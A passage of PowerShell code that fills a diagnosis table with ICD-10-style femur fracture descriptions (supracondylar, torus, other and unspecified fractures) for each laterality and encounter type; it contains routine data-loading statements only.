$DiagnosisList.Rows.Add("Displaced supracondylar fracture with intracondylar extension of lower end of left femur","Displaced supracondylar fracture with intracondylar extension of lower end of left femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Displaced supracondylar fracture with intracondylar extension of lower end of left femur","Displaced supracondylar fracture with intracondylar extension of lower end of left femur, sequela") + $null = $DiagnosisList.Rows.Add("Displaced supracondylar fracture with intracondylar extension of lower end of unspecified femur","Displaced supracondylar fracture with intracondylar extension of lower end of unspecified femur, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced supracondylar fracture with intracondylar extension of lower end of unspecified femur","Displaced supracondylar fracture with intracondylar extension of lower end of unspecified femur, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Displaced supracondylar fracture with intracondylar extension of lower end of unspecified femur","Displaced supracondylar fracture with intracondylar extension of lower end of unspecified femur, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Displaced supracondylar fracture with intracondylar extension of lower end of unspecified femur","Displaced supracondylar fracture with intracondylar extension of lower end of unspecified femur, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced supracondylar fracture with intracondylar extension of lower end of unspecified femur","Displaced supracondylar fracture with intracondylar extension of lower end of unspecified femur, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced supracondylar fracture with intracondylar extension of lower end of unspecified femur","Displaced supracondylar fracture with intracondylar extension of lower end of unspecified femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced supracondylar fracture with intracondylar extension of lower end of unspecified femur","Displaced supracondylar fracture with intracondylar extension of lower end of unspecified femur, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced supracondylar fracture with intracondylar extension of lower end of unspecified femur","Displaced supracondylar fracture with intracondylar extension of lower end of unspecified femur, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced supracondylar fracture with intracondylar extension of lower end of unspecified femur","Displaced supracondylar fracture with intracondylar extension of lower end of unspecified femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced supracondylar fracture with intracondylar extension of lower end of unspecified femur","Displaced supracondylar fracture with intracondylar extension of lower end of unspecified femur, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced supracondylar fracture with intracondylar extension of lower end of unspecified femur","Displaced supracondylar fracture with intracondylar extension of lower end of unspecified femur, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced supracondylar fracture with intracondylar extension of lower end of unspecified femur","Displaced supracondylar fracture with intracondylar extension of lower end of unspecified femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced supracondylar fracture with intracondylar extension of lower end of unspecified femur","Displaced supracondylar fracture with intracondylar extension of lower end of unspecified femur, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced supracondylar fracture with intracondylar extension of lower end of unspecified femur","Displaced supracondylar fracture with intracondylar extension of lower end of unspecified femur, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Displaced supracondylar fracture with intracondylar extension of lower end of unspecified femur","Displaced supracondylar fracture with intracondylar extension of lower end of unspecified femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Displaced supracondylar fracture with intracondylar extension of lower end of unspecified femur","Displaced supracondylar fracture with intracondylar extension of lower end of unspecified femur, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced supracondylar fracture with intracondylar extension of lower end of right femur","Nondisplaced supracondylar fracture with intracondylar extension of lower end of right femur, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced supracondylar fracture with intracondylar extension of lower end of right femur","Nondisplaced supracondylar fracture with intracondylar extension of lower end of right femur, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Nondisplaced supracondylar fracture with intracondylar extension of lower end of right femur","Nondisplaced supracondylar fracture with intracondylar extension of lower end of right femur, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Nondisplaced supracondylar fracture with intracondylar extension of lower end of right femur","Nondisplaced supracondylar fracture with intracondylar extension of lower end of right femur, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced supracondylar fracture with intracondylar extension of lower end of right femur","Nondisplaced supracondylar fracture with intracondylar extension of lower end of right femur, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced supracondylar fracture with intracondylar extension of lower end of right femur","Nondisplaced supracondylar fracture with intracondylar extension of lower end of right femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced supracondylar fracture with intracondylar extension of lower end of right femur","Nondisplaced supracondylar fracture with intracondylar extension of lower end of right femur, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced supracondylar fracture with intracondylar extension of lower end of right femur","Nondisplaced supracondylar fracture with intracondylar extension of lower end of right femur, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced supracondylar fracture with intracondylar extension of lower end of right femur","Nondisplaced supracondylar fracture with intracondylar extension of lower end of right femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced supracondylar fracture with intracondylar extension of lower end of right femur","Nondisplaced supracondylar fracture with intracondylar extension of lower end of right femur, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced supracondylar fracture with intracondylar extension of lower end of right femur","Nondisplaced supracondylar fracture with intracondylar extension of lower end of right femur, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced supracondylar fracture with intracondylar extension of lower end of right femur","Nondisplaced supracondylar fracture with intracondylar extension of lower end of right femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced supracondylar fracture with intracondylar extension of lower end of right femur","Nondisplaced supracondylar fracture with intracondylar extension of lower end of right femur, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced supracondylar fracture with intracondylar extension of lower end of right femur","Nondisplaced supracondylar fracture with intracondylar extension of lower end of right femur, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced supracondylar fracture with intracondylar extension of lower end of right femur","Nondisplaced supracondylar fracture with intracondylar extension of lower end of right femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced supracondylar fracture with intracondylar extension of lower end of right femur","Nondisplaced supracondylar fracture with intracondylar extension of lower end of right femur, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced supracondylar fracture with intracondylar extension of lower end of left femur","Nondisplaced supracondylar fracture with intracondylar extension of lower end of left femur, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced supracondylar fracture with intracondylar extension of lower end of left femur","Nondisplaced supracondylar fracture with intracondylar extension of lower end of left femur, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Nondisplaced supracondylar fracture with intracondylar extension of lower end of left femur","Nondisplaced supracondylar fracture with intracondylar extension of lower end of left femur, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Nondisplaced supracondylar fracture with intracondylar extension of lower end of left femur","Nondisplaced supracondylar fracture with intracondylar extension of lower end of left femur, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced supracondylar fracture with intracondylar extension of lower end of left femur","Nondisplaced supracondylar fracture with intracondylar extension of lower end of left femur, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced supracondylar fracture with intracondylar extension of lower end of left femur","Nondisplaced supracondylar fracture with intracondylar extension of lower end of left femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced supracondylar fracture with intracondylar extension of lower end of left femur","Nondisplaced supracondylar fracture with intracondylar extension of lower end of left femur, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced supracondylar fracture with intracondylar extension of lower end of left femur","Nondisplaced supracondylar fracture with intracondylar extension of lower end of left femur, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced supracondylar fracture with intracondylar extension of lower end of left femur","Nondisplaced supracondylar fracture with intracondylar extension of lower end of left femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced supracondylar fracture with intracondylar extension of lower end of left femur","Nondisplaced supracondylar fracture with intracondylar extension of lower end of left femur, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced supracondylar fracture with intracondylar extension of lower end of left femur","Nondisplaced supracondylar fracture with intracondylar extension of lower end of left femur, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced supracondylar fracture with intracondylar extension of lower end of left femur","Nondisplaced supracondylar fracture with intracondylar extension of lower end of left femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced supracondylar fracture with intracondylar extension of lower end of left femur","Nondisplaced supracondylar fracture with intracondylar extension of lower end of left femur, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced supracondylar fracture with intracondylar extension of lower end of left femur","Nondisplaced supracondylar fracture with intracondylar extension of lower end of left femur, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced supracondylar fracture with intracondylar extension of lower end of left femur","Nondisplaced supracondylar fracture with intracondylar extension of lower end of left femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced supracondylar fracture with intracondylar extension of lower end of left femur","Nondisplaced supracondylar fracture with intracondylar extension of lower end of left femur, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced supracondylar fracture with intracondylar extension of lower end of unspecified femur","Nondisplaced supracondylar fracture with intracondylar extension of lower end of unspecified femur, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced supracondylar fracture with intracondylar extension of lower end of unspecified femur","Nondisplaced supracondylar fracture with intracondylar extension of lower end of unspecified femur, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Nondisplaced supracondylar fracture with intracondylar extension of lower end of unspecified femur","Nondisplaced supracondylar fracture with intracondylar extension of lower end of unspecified femur, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Nondisplaced supracondylar fracture with intracondylar extension of lower end of unspecified femur","Nondisplaced supracondylar fracture with intracondylar extension of lower end of unspecified femur, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced supracondylar fracture with intracondylar extension of lower end of unspecified femur","Nondisplaced supracondylar fracture with intracondylar extension of lower end of unspecified femur, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced supracondylar fracture with intracondylar extension of lower end of unspecified femur","Nondisplaced supracondylar fracture with intracondylar extension of lower end of unspecified femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced supracondylar fracture with intracondylar extension of lower end of unspecified femur","Nondisplaced supracondylar fracture with intracondylar extension of lower end of unspecified femur, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced supracondylar fracture with intracondylar extension of lower end of unspecified femur","Nondisplaced supracondylar fracture with intracondylar extension of lower end of unspecified femur, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced supracondylar fracture with intracondylar extension of lower end of unspecified femur","Nondisplaced supracondylar fracture with intracondylar extension of lower end of unspecified femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced supracondylar fracture with intracondylar extension of lower end of unspecified femur","Nondisplaced supracondylar fracture with intracondylar extension of lower end of unspecified femur, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced supracondylar fracture with intracondylar extension of lower end of unspecified femur","Nondisplaced supracondylar fracture with intracondylar extension of lower end of unspecified femur, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced supracondylar fracture with intracondylar extension of lower end of unspecified femur","Nondisplaced supracondylar fracture with intracondylar extension of lower end of unspecified femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced supracondylar fracture with intracondylar extension of lower end of unspecified femur","Nondisplaced supracondylar fracture with intracondylar extension of lower end of unspecified femur, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced supracondylar fracture with intracondylar extension of lower end of unspecified femur","Nondisplaced supracondylar fracture with intracondylar extension of lower end of unspecified femur, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced supracondylar fracture with intracondylar extension of lower end of unspecified femur","Nondisplaced supracondylar fracture with intracondylar extension of lower end of unspecified femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced supracondylar fracture with intracondylar extension of lower end of unspecified femur","Nondisplaced supracondylar fracture with intracondylar extension of lower end of unspecified femur, sequela") + $null = $DiagnosisList.Rows.Add("Torus fracture of lower end of right femur","Torus fracture of lower end of right femur, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Torus fracture of lower end of right femur","Torus fracture of lower end of right femur, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Torus fracture of lower end of right femur","Torus fracture of lower end of right femur, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Torus fracture of lower end of right femur","Torus fracture of lower end of right femur, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Torus fracture of lower end of right femur","Torus fracture of lower end of right femur, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Torus fracture of lower end of right femur","Torus fracture of lower end of right femur, sequela") + $null = $DiagnosisList.Rows.Add("Torus fracture of lower end of left femur","Torus fracture of lower end of left femur, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Torus fracture of lower end of left femur","Torus fracture of lower end of left femur, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Torus fracture of lower end of left femur","Torus fracture of lower end of left femur, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Torus fracture of lower end of left femur","Torus fracture of lower end of left femur, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Torus fracture of lower end of left femur","Torus fracture of lower end of left femur, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Torus fracture of lower end of left femur","Torus fracture of lower end of left femur, sequela") + $null = $DiagnosisList.Rows.Add("Torus fracture of lower end of unspecified femur","Torus fracture of lower end of unspecified femur, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Torus fracture of lower end of unspecified femur","Torus fracture of lower end of unspecified femur, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Torus fracture of lower end of unspecified femur","Torus fracture of lower end of unspecified femur, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Torus fracture of lower end of unspecified femur","Torus fracture of lower end of unspecified femur, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Torus fracture of lower end of unspecified femur","Torus fracture of lower end of unspecified femur, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Torus fracture of lower end of unspecified femur","Torus fracture of lower end of unspecified femur, sequela") + $null = $DiagnosisList.Rows.Add("Other fracture of lower end of right femur","Other fracture of lower end of right femur, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Other fracture of lower end of right femur","Other fracture of lower end of right femur, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Other fracture of lower end of right femur","Other fracture of lower end of right femur, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Other fracture of lower end of right femur","Other fracture of lower end of right femur, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other fracture of lower end of right femur","Other fracture of lower end of right femur, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Other fracture of lower end of right femur","Other fracture of lower end of right femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Other fracture of lower end of right femur","Other fracture of lower end of right femur, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other fracture of lower end of right femur","Other fracture of lower end of right femur, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Other fracture of lower end of right femur","Other fracture of lower end of right femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Other fracture of lower end of right femur","Other fracture of lower end of right femur, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other fracture of lower end of right femur","Other fracture of lower end of right femur, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Other fracture of lower end of right femur","Other fracture of lower end of right femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Other fracture of lower end of right femur","Other fracture of lower end of right femur, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Other fracture of lower end of right femur","Other fracture of lower end of right femur, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Other fracture of lower end of right femur","Other fracture of lower end of right femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Other fracture of lower end of right femur","Other fracture of lower end of right femur, sequela") + $null = $DiagnosisList.Rows.Add("Other fracture of lower end of left femur","Other fracture of lower end of left femur, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Other fracture of lower end of left femur","Other fracture of lower end of left femur, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Other fracture of lower end of left femur","Other fracture of lower end of left femur, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Other fracture of lower end of left femur","Other fracture of lower end of left femur, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other fracture of lower end of left femur","Other fracture of lower end of left femur, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Other fracture of lower end of left femur","Other fracture of lower end of left femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Other fracture of lower end of left femur","Other fracture of lower end of left femur, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other fracture of lower end of left femur","Other fracture of lower end of left femur, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Other fracture of lower end of left femur","Other fracture of lower end of left femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Other fracture of lower end of left femur","Other fracture of lower end of left femur, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other fracture of lower end of left femur","Other fracture of lower end of left femur, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Other fracture of lower end of left femur","Other fracture of lower end of left femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Other fracture of lower end of left femur","Other fracture of lower end of left femur, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Other fracture of lower end of left femur","Other fracture of lower end of left femur, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Other fracture of lower end of left femur","Other fracture of lower end of left femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Other fracture of lower end of left femur","Other fracture of lower end of left femur, sequela") + $null = $DiagnosisList.Rows.Add("Other fracture of lower end of unspecified femur","Other fracture of lower end of unspecified femur, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Other fracture of lower end of unspecified femur","Other fracture of lower end of unspecified femur, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Other fracture of lower end of unspecified femur","Other fracture of lower end of unspecified femur, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Other fracture of lower end of unspecified femur","Other fracture of lower end of unspecified femur, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other fracture of lower end of unspecified femur","Other fracture of lower end of unspecified femur, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Other fracture of lower end of unspecified femur","Other fracture of lower end of unspecified femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Other fracture of lower end of unspecified femur","Other fracture of lower end of unspecified femur, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other fracture of lower end of unspecified femur","Other fracture of lower end of unspecified femur, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Other fracture of lower end of unspecified femur","Other fracture of lower end of unspecified femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Other fracture of lower end of unspecified femur","Other fracture of lower end of unspecified femur, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other fracture of lower end of unspecified femur","Other fracture of lower end of unspecified femur, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Other fracture of lower end of unspecified femur","Other fracture of lower end of unspecified femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Other fracture of lower end of unspecified femur","Other fracture of lower end of unspecified femur, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Other fracture of lower end of unspecified femur","Other fracture of lower end of unspecified femur, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Other fracture of lower end of unspecified femur","Other fracture of lower end of unspecified femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Other fracture of lower end of unspecified femur","Other fracture of lower end of unspecified femur, sequela") + $null = $DiagnosisList.Rows.Add("Other fracture of right femur","Other fracture of right femur, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Other fracture of right femur","Other fracture of right femur, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Other fracture of right femur","Other fracture of right femur, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Other fracture of right femur","Other fracture of right femur, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other fracture of right femur","Other fracture of right femur, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Other fracture of right femur","Other fracture of right femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Other fracture of right femur","Other fracture of right femur, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other fracture of right femur","Other fracture of right femur, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Other fracture of right femur","Other fracture of right femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Other fracture of right femur","Other fracture of right femur, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other fracture of right femur","Other fracture of right femur, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Other fracture of right femur","Other fracture of right femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Other fracture of right femur","Other fracture of right femur, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Other fracture of right femur","Other fracture of right femur, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Other fracture of right femur","Other fracture of right femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Other fracture of right femur","Other fracture of right femur, sequela") + $null = $DiagnosisList.Rows.Add("Other fracture of left femur","Other fracture of left femur, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Other fracture of left femur","Other fracture of left femur, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Other fracture of left femur","Other fracture of left femur, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Other fracture of left femur","Other fracture of left femur, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other fracture of left femur","Other fracture of left femur, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Other fracture of left femur","Other fracture of left femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Other fracture of left femur","Other fracture of left femur, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other fracture of left femur","Other fracture of left femur, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Other fracture of left femur","Other fracture of left femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Other fracture of left femur","Other fracture of left femur, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other fracture of left femur","Other fracture of left femur, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Other fracture of left femur","Other fracture of left femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Other fracture of left femur","Other fracture of left femur, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Other fracture of left femur","Other fracture of left femur, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Other fracture of left femur","Other fracture of left femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Other fracture of left femur","Other fracture of left femur, sequela") + $null = $DiagnosisList.Rows.Add("Other fracture of unspecified femur","Other fracture of unspecified femur, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Other fracture of unspecified femur","Other fracture of unspecified femur, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Other fracture of unspecified femur","Other fracture of unspecified femur, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Other fracture of unspecified femur","Other fracture of unspecified femur, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other fracture of unspecified femur","Other fracture of unspecified femur, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Other fracture of unspecified femur","Other fracture of unspecified femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Other fracture of unspecified femur","Other fracture of unspecified femur, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other fracture of unspecified femur","Other fracture of unspecified femur, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Other fracture of unspecified femur","Other fracture of unspecified femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Other fracture of unspecified femur","Other fracture of unspecified femur, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other fracture of unspecified femur","Other fracture of unspecified femur, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Other fracture of unspecified femur","Other fracture of unspecified femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Other fracture of unspecified femur","Other fracture of unspecified femur, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Other fracture of unspecified femur","Other fracture of unspecified femur, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Other fracture of unspecified femur","Other fracture of unspecified femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Other fracture of unspecified femur","Other fracture of unspecified femur, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of unspecified femur","Unspecified fracture of unspecified femur, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of unspecified femur","Unspecified fracture of unspecified femur, initial encounter for open fracture type I or II") + $null = 